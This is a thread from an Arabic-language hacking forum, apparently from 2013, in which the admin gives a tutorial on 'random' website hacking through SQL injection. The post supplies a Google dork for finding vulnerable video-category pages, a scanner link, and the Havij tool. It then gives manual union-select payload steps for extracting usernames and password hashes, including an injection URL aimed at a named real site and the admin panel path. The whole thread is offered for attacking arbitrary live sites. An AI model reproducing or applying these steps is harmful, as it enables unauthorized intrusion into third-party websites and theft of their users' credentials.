Gene Hacker Egypt
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

Gene Hacker Egypt

 
الرئيسيةأحدث الصورشات الهكر المصرى التسجيلدخول

 

 الاختراق العشواءي دورك ثغرة SQL

اذهب الى الأسفل 
3 مشترك
كاتب الموضوعرسالة
MoRa Hacker
Admin
MoRa Hacker


عدد المساهمات : 26
تاريخ التسجيل : 21/03/2013

الاختراق العشواءي دورك ثغرة SQL Empty
مُساهمةموضوع: الاختراق العشواءي دورك ثغرة SQL   الاختراق العشواءي دورك ثغرة SQL Icon_minitimeالأحد يونيو 30, 2013 6:45 pm




بسم الله الرحمن الرحيم

 
ثغرة SQL

ضع هذا الرمز فى جوجل


او ضع الرمز فى هذا الموقع للبحث عن المواقع الصابه بالثغره
http://isoftwarez.com/scanner/scanner/

غير Google الى Bing
وضع علامة على Depth scan ( slow but sure )
ثــم اضغط على  Search


الكود:
inurl:"videos.php?cat="
الاستغلال تقدر تستخدم برنامج havij
أو

عن طريق الاستغلال اليدوي

تضيف اخر الرابط لما تطلع عدد العواميد




الكود:
+from+cb_user
وبدال العامود المصاب


الكود:
usern ame
شيل المسافة الموجودة في كلمة na me

ولما تاخذ اليوزر جاء وقت كلمة المرور

ضيف بدال العامود المصاب



الكود:
password
المشكلة يطلع الباسورد في صورة هاش يصعب فكه

الي يلقى طريقة لفكه لا يبخل علينا في وضعها

مثال

lhttp://alfatimi.tv/videos.php?cat=-1238+union+select+1,2,user****,4,5,6,7,8,9+from+cb_users--

مسار لوحة التحكم

http://localhost/admin_area/login.php

وفي الاخير كلمة شكر تكفي

مـــع تحياتى: MoRa Hacker
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://genehackeregypt.com
xFoxHacker

xFoxHacker


عدد المساهمات : 4
تاريخ التسجيل : 06/01/2014

الاختراق العشواءي دورك ثغرة SQL Empty
مُساهمةموضوع: رد: الاختراق العشواءي دورك ثغرة SQL   الاختراق العشواءي دورك ثغرة SQL Icon_minitimeالإثنين يناير 06, 2014 10:56 am

السلام عليكم اخوي دخلت الموقع وحطيت الرمز يقولني *** finish ( no more search results from google )

 scratch 
الرجوع الى أعلى الصفحة اذهب الى الأسفل
كاتب هذه المساهمة مطرود حالياً من المنتدى - معاينة المساهمة
 
الاختراق العشواءي دورك ثغرة SQL
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» ثغرة للمواقع
» ثغرة لرفع الشل
» ثغرة inurl:"admin/my_documents/my_files"
» ثغرة ابلواد لرفع الشيل بصيغة php.

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
Gene Hacker Egypt :: دورة اختراق المواقع 2013-
انتقل الى: